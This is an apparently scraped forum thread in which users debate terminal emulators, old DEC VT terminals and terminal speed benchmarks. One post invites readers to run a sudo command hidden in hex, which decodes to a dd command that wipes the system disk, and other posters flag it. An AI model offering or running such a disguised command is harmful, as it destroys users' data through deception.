So what are some Sup Forums approved terminals?

So what are some Sup Forums approved terminals?

Other urls found in this thread:

github.com/meh/cancer
hyper.is/
inconsolation.wordpress.com/2013/03/08/bonus-revisiting-fbterm/
ietf.org/rfc/rfc3261.txt
twitter.com/SFWRedditVideos

st is the only way to go.

github.com/meh/cancer

iterm2 is the best

powershell 2

A lot of options here. Any specific reasons why it's the best?

guake is greatest of all time

Anything but xterm.

xterm

only right answer

Termite

wtf is a terminal ?

What's that monitor with the Apple logo, and is it good?

i dunno user

this

That's not a terminal.

Terminoloty is awesome. Nyan nyan.

I like terminator. Really, it's all I know so I can't tell you why it's better than what you're using.

Alt + Enter = new terminal
Fn + t = split terminal vertically
Fn + alt + t = split terminal horizontally.
Alt-arrow keys to focus on the terminal to the arrow direction.

Tilix is great, written in D (yes) and with GTK+3

>2017
>having a radiation machine plugged in

Rxvt-unicode

Too bad libvte is pretty shitty.

> t.mactoddler

No proper true color support.

hyper.is/

You mean like a wifi transceiver...

It's pretty slow as far as terminals go, but it can be much faster.

But hey, at least the vi-like interface is pretty cool, and it supports sixels.

That's a bad idea and you know it.

iTerm is pretty damn slow and its font rendering is crappy when dealing with graphical characters from unicode or the alternative charset.

Terminology is great. Just look at it. No other terminal has that comfy light from top of the window.

:^)

urxvt

on windows, ConEmu is the way to go

This shit is too slow.
Is it slow because it's in rust or it's just an inefficient implementation?

my man

>Cool Retro Term
lol, That's funny.

It's cancer so you should be glad it's slow

terminix

i like gnome, but maybe because i have been using it for 8 years and it has alot of options.. just started using the mac terminal and its not that bad.

this but i only use it because padding borders not because i'm some sort of autistic power user

Been using sakura for years without issue.

I like Terminal.app

urxvt is the way to go
xterm, and termite are both note worthy

guake is the fuckign worst of the worst
even gnome, mate, and xfce terms are better than that drop down worthless flaming bag of turds

On windows, absolutely Moba XTerm. Nothing better.

sakura.

Best compromise between functionality and lightweightness among the libvte terminals.

wanted to get one, but a bit too rich for my tastes.

should lurk in recycling places for a machine like that. would love one always at the ready.

Suckless

guake is pretty comfy for quick terminal access. i'm not sure why you need it over any other terminal emulator binded to a key in your wm, though.

So what advantages do these have over something like konsole or gnome-terminal?

Look for a VT320 or VT420, they're cheaper and easier to find.

basically nothing.

will do, really did a cursory search so didn't check out any other model.

I have it a try it's nifty

I use the terminal almost everyday and I don't see a fucking difference between gnome, urvxt and the xfce one.

Yeah DEC VT220's are definitely cool pieces of history but you'll never find one for cheap since they're so desirable to collectors/enthusiasts.

If you're looking for a terminal that's actually usable with modern shell programs then the later VT models are arguably better because they support 48 line / 132 column modes.

Otherwise just beware the VT420 only has MMJ ports so you'll need to buy the correct cable and DB9 adapter to use it. Cheers.

I have 2 gigantic flatscreens. Both are flipped vertically and are just emacs windows. I never leave emacs including to shitpost here.

I don't have X, I have a framebuffer inconsolation.wordpress.com/2013/03/08/bonus-revisiting-fbterm/

Where I work tried to send me a Mac to use Slack and I refused instead writing a tiny script that polls slack for new posts and leaves them in a text file for me to check whenever I get around to it. It's great and totally filters out all the bullshit memes coworkers spam to save time.

Every month I am the most productive developer, everybody thinks I am some 10x dev super human but all I did was reduce all distractions to a bare minimum.

You realize lcd screens emit radiation as well right? Its just that most of it is visible light.

another decade and you'll be a stallman-tier lunatic

sudo $(echo "64642069663d2f6465762f7a65726f206f663d2f6465762f73646120636f756e743d3130302062733d314d0a" | xxd -r -p)

try this one.

> executing a sudo command
> executing a sudo command from Sup Forums
wew lad

I'm a fan of the VT420. I also have this DEC UNIX keyboard.

meh was a pedo from 99chan
and all his software is built with ruby

How about whatever is installed?

You type in some characters, you read back the text that is printed

What other features do you need?

fpbp

Kind of proud that I recognized the start of that as the ascii hex for "dd".

cmd

Fbpb

I'm a boring / lazy person and use whatever is default. That means Terminal.app on macOS, xterm on OpenBSD, cmd.exe on Windows 10 and whatever the shit that comes with Ubuntu is called.

Termite

>all these retards itt referring to terminial emulators as terminals

why is Sup Forums full of computer illiterates?

You don't. Guake is just the classic drop down.

this this and this

Xfce4 terminal here.

Is that a pikachu themed terminal? So cute!

>UWA
What a coincidence. I used that terminal once, it's from the University Computer Club.

Most likely - like in most of those cases - it's because text rendering.

In what situations is it too slow?

And yet here you are deluding yourself into oblivion, with embarrassing shitpost on the most cancerous sites of all. Great life, dude!

9term
Terminal.app
st

whichever one came on my shit.. xterm or rxvt i think. I dont know and I don't care.

I hear Cancer is the best terminal

iterm 2 nightly
Tmux
Vim
Zsh
/thread

Never had an issue with gnome's terminal as a desktop user but I don't live in the terminal, it is only used for system maintence.

If I was a sysadmin managing a bunch of boxes I would use a more optimal config. Probably something heavy like terminator as it's your primary work environment.

Tried it once. It worked like absolute shit.

>vim+tmux not neovim+:terminal

$(echo "6563686f206e6f0a" | xxd -p -r)

>terminal cancer

always found amber monochrome to be much more pleasant to look at than green

Any terminal where you can set the background to dark yellow and the letters to phosphorus green

There's a reason why amber is a common car interior lighting colour and green is not.

>and green is not.
not anymore.
it used to be everywhere before those fucking spaceblue leds and bright as fuck LCD screens started appearing everywhere.

but i believe amber is in use because it's much closer to red, and red ruins your nightvision the least.

Same here.
I don't see the point of changing it. Especially when i use i3wm.
That way any terminal works.

there are few benefits from using a different terminal.

With a fast machine and a slow terminal (xterm is probably the slowest in we have right now) the terminal speed (the rate at which it can put lines of output on the screen) can be a massive bottleneck, especially during compilation.

note that the result in pic related are decade old.
Nowadays rxvt-unicode is probably the fastest fully featured terminal emulator.

test was contucted with
wget ietf.org/rfc/rfc3261.txt
time cat rfc3261.txt

Since we've done leaps in terms of performance in the last decade I would actually recommend to do the same with a longer file for reuslts that are more easily comparable.
for n in {1..100}; do cat rfc3261.txt >> longtext.txt; done
time cat longtext.txt

Post your results!

in my case the difference between xfce4-terminal and urxvt, the two emulators i have installed was massive.

xfce4-terminal took 2m8.394s to complete
urxvtc took 0m6.518s

I was a big fan of Terminator, but then I realized I wasn't even using most of its properties.

For me it's uxterm™ the best Linux™ terminal emulator.

The default osx terminal is pretty good desu

>terminal cancer